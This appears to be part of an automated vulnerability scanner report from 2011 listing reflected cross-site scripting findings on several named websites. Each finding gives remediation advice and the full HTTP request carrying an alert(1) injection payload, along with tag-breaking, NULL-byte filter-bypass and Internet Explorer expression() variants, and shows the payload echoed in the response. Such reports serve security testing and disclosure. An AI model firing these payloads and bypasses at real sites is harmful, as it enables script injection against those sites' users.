Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cid=inav_home&inav=menu_business_openforum1db04'-alert(1)-'749ae354a20 HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Thu, 03 Feb 2011 13:50:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 13:50:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2819336384.20480.0000; path=/ Content-Length: 102377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
4.502. https://www.openforum.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.openforum.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a374f'-alert(1)-'7289baab9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?a374f'-alert(1)-'7289baab9b9=1 HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Thu, 03 Feb 2011 13:50:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 13:50:35 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2836113600.20480.0000; path=/ Content-Length: 102556
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aac2e"%3balert(1)//8d034beed23 was submitted in the campaignId parameter. This input was echoed as aac2e";alert(1)//8d034beed23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-listings?tsrc=SP&campaignId=SP_FT_AddEditaBusinessaac2e"%3balert(1)//8d034beed23 HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:53 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>
The value of the tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20b9c"%3balert(1)//623d3053168 was submitted in the tsrc parameter. This input was echoed as 20b9c";alert(1)//623d3053168 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-listings?tsrc=SP20b9c"%3balert(1)//623d3053168&campaignId=SP_FT_AddEditaBusiness HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:48 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Get Your Free Business Listing | SuperMedia.com Advertising</title>
The value of the &tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 198c8"%3balert(1)//96cb9badcf2 was submitted in the &tsrc parameter. This input was echoed as 198c8";alert(1)//96cb9badcf2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-listings/business-profile?&tsrc=SP198c8"%3balert(1)//96cb9badcf2&campaignId=BP:Update+Your+Profile+Top HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 17:05:34 GMT Set-Cookie: JSESSIONID=B9B8A68CD261E7EEF56BA494FDEE7747.app3-a1; Path=/ Set-Cookie: trafficSource="SP198c8\";alert(1)//96cb9badcf2"; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/ Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:33 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Your Business Profile | SuperMedia.com Advertising</title>
The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d7a"%3balert(1)//5f4e0e8915 was submitted in the campaignId parameter. This input was echoed as b7d7a";alert(1)//5f4e0e8915 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-listings/business-profile?&tsrc=SP&campaignId=BP:Update+Your+Profile+Topb7d7a"%3balert(1)//5f4e0e8915 HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 17:05:45 GMT Set-Cookie: JSESSIONID=63B1953F08BCF0514CDCD4855AE3E1E8.app7-a1; Path=/ Set-Cookie: trafficSource=SP; Expires=Sat, 05-Mar-2011 17:05:41 GMT; Path=/ Set-Cookie: CstrStatus=U; Expires=Sat, 05-Mar-2011 17:05:41 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close Set-Cookie: NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Your Business Profile | SuperMedia.com Advertising</title>
The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00647f4"%3balert(1)//acd0e29ec22 was submitted in the campaignId parameter. This input was echoed as 647f4";alert(1)//acd0e29ec22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-listings/business-profile?&tsrc=SP&campaignId=BP:Update+Your+Profile+Top%00647f4"%3balert(1)//acd0e29ec22 HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:48 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Your Business Profile | SuperMedia.com Advertising</title>
The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f17b"%3balert(1)//351308f1023 was submitted in the campaignId parameter. This input was echoed as 6f17b";alert(1)//351308f1023 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online-advertising?tsrc=SP&campaignId=SP_FT_AdvertiseWithUs6f17b"%3balert(1)//351308f1023 HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:33 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
The value of the tsrc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9e22"%3balert(1)//51aaefb74c6 was submitted in the tsrc parameter. This input was echoed as b9e22";alert(1)//51aaefb74c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online-advertising?tsrc=SPb9e22"%3balert(1)//51aaefb74c6&campaingnId=SP_listing_header HTTP/1.1 Host: www.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; trafficSource="SP198c8\"; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; CstrStatus=U; undefined_s=First%20Visit; mbox=check#true#1296759636|session#1296759528614-838261#1296761436;
Response
HTTP/1.1 200 OK Server: Unspecified Date: Thu, 03 Feb 2011 19:16:13 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
4.510. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superpages.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b3044--><script>alert(1)</script>9a336ccd25a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?b3044--><script>alert(1)</script>9a336ccd25a=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:20 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:20 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a href="?SRC=&b3044--><script>alert(1)</script>9a336ccd25a=1#" rel="nofollow"> ...[SNIP]...
4.511. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superpages.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab2fa"><script>alert(1)</script>887ac555049 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?ab2fa"><script>alert(1)</script>887ac555049=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:12 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:14 GMT;path=/
4.512. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c040f'-alert(1)-'b2565b0ba7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?c040f'-alert(1)-'b2565b0ba7=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 17:07:16 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:22:16 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&c040f'-alert(1)-'b2565b0ba7=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce45f"-alert(1)-"161ba1e0a00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/Facebookce45f"-alert(1)-"161ba1e0a00 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; JSESSIONID=68DE2DCAFDD7D20B297AC05CB654492B; s_lastvisit=1296748870245; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d245525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; SPC=1296748823650-www.superpages.com-30323935-794472; s_dfa=superpagescom; s_pv=Business%20Profile;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=F81968BB9B8C6E79A245B67095187467; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 57268 Date: Thu, 03 Feb 2011 17:06:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... ellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/Facebookce45f"-alert(1)-"161ba1e0a00?="; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of the PGID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e44e9"-alert(1)-"ac1eec3d3bf was submitted in the PGID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750566133-www.superpages.com-18392944-855020; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:29:26 GMT; Path=/ Set-Cookie: JSESSIONID=15DD6E10C9F988449C56134A74598F9A; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:29:25 GMT Content-Length: 66686
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]... ype="two"; searchtype="two"; var actualUrl = "http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855e44e9"-alert(1)-"ac1eec3d3bf&bidType=CLIK&TR=1"; var client_id = "133515049997773"; var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile'; //--> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f735"-alert(1)-"5e13c75896f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750717878-www.superpages.com-25570824-638833; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:31:57 GMT; Path=/ Set-Cookie: JSESSIONID=5C32A1099510A145A292891057754A90; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:31:57 GMT Content-Length: 66498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Ally Bank in Philad ...[SNIP]... tp://yellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="two"; var actualUrl = "http://www.superpages.com/bp/US9f735"-alert(1)-"5e13c75896f/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1"; var client_id = "133515049997773"; var redirecturl = 'ht ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb7a3"-alert(1)-"d9426b3b370 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htmbb7a3"-alert(1)-"d9426b3b370?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the SRC request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ebe9"%3balert(1)//fc3f4c0a516 was submitted in the SRC parameter. This input was echoed as 3ebe9";alert(1)//fc3f4c0a516 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a3ebe9"%3balert(1)//fc3f4c0a516&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1296750452826-www.superpages.com-16809597-702534; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:27:32 GMT; Path=/ Set-Cookie: JSESSIONID=4CDE972A6F7062265EBD4234C3250381; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Thu, 03 Feb 2011 16:27:33 GMT Content-Length: 126537
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... ww.superpages.com"; s.prop5 = "Advanced Search, Business Profile"; s.prop9 = "Advanced Search"; s.eVar23 = "Advanced Search"; s.hier1 = "Advanced Search, Business Profile"; var s_campaign = "comlocal1a3ebe9";alert(1)//fc3f4c0a516"; if(s_campaign){ s.campaign = s_campaign; } var s_code = s.t(); if(s_code) document.writeln(s_code); //--> ...[SNIP]...
The value of the SRC request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02 was submitted in the SRC parameter. This input was echoed as 8c3a4"style="x:expression(alert(1))"d28cbb2cb02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a8c3a4"style%3d"x%3aexpression(alert(1))"d28cbb2cb02&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 HTTP/1.1 Host: www.superpages.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
